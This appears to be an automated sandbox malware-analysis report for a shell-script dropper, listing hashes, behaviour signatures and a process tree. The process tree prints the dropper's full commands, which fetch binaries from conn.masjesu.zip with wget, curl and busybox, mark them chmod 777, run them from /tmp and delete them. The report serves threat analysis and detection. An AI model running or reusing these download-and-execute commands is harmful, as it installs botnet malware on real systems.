Analysis
-
max time kernel
150s -
max time network
56s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/11/2024, 05:03
Static task
static1
Behavioral task
behavioral1
Sample
57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
-
Size
10KB
-
MD5
949d488100620ea8b120daff8dc03bcb
-
SHA1
0c754e9fb78db8e7a75b06863994e13cf648e996
-
SHA256
57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649
-
SHA512
116e81b69f685ba3702900725834b72fa78dfec497124e7200dea051854c71a6ffa3818723b1c0d62b192bbc945ae89bffc4756ff3197c81b4c2f2f409aab453
-
SSDEEP
192:P07/zgIn65Qy7nDoEv5e6qUp9gPnnp9gPnN/LgIn65Q0nDo8e6c:P07rgIn6uy5vIUp9gPnnp9gPnNjgIn60
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 888 chmod 747 chmod 783 chmod 813 chmod 867 chmod 881 chmod 895 chmod 740 chmod 754 chmod 823 chmod 845 chmod 874 chmod -
Executes dropped EXE 12 IoCs
ioc pid Process /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM 741 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE 748 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ 756 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik 785 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq 814 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN 824 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc 846 yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX 868 SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 875 ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm 882 ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f 889 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD 896 nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 38 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 743 wget 753 busybox 826 wget 877 wget 887 busybox 746 busybox 811 busybox 870 wget 894 busybox 732 curl 816 wget 892 curl 898 wget 851 wget 884 wget 827 curl 871 curl 873 busybox 862 curl 866 busybox 715 wget 751 curl 760 wget 776 busybox 817 curl 822 busybox 899 curl 885 curl 738 busybox 744 curl 750 wget 766 curl 790 wget 797 curl 838 busybox 878 curl 880 busybox 891 wget -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE curl File opened for modification /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq curl File opened for modification /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN curl File opened for modification /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc curl File opened for modification /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 curl File opened for modification /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f curl File opened for modification /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM curl File opened for modification /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ curl File opened for modification /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik curl File opened for modification /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX curl File opened for modification /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm curl File opened for modification /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD curl
Processes
-
/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- System Network Configuration Discovery
PID:715
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- System Network Configuration Discovery
PID:738
-
-
/bin/chmodchmod 777 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM./uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵PID:742
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- System Network Configuration Discovery
PID:743
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod 777 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE./Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵PID:749
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- System Network Configuration Discovery
PID:750
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- System Network Configuration Discovery
PID:753
-
-
/bin/chmodchmod 777 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ./eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵PID:759
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- System Network Configuration Discovery
PID:760
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- System Network Configuration Discovery
PID:776
-
-
/bin/chmodchmod 777 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik./6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵PID:788
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- System Network Configuration Discovery
PID:790
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- System Network Configuration Discovery
PID:811
-
-
/bin/chmodchmod 777 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq./WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵PID:815
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- System Network Configuration Discovery
PID:816
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- System Network Configuration Discovery
PID:822
-
-
/bin/chmodchmod 777 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN./bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵PID:825
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵
- System Network Configuration Discovery
PID:826
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵
- System Network Configuration Discovery
PID:838
-
-
/bin/chmodchmod 777 yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc./yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵PID:849
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵
- System Network Configuration Discovery
PID:851
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX./SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5./ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm./ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f./zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD./nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:899
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97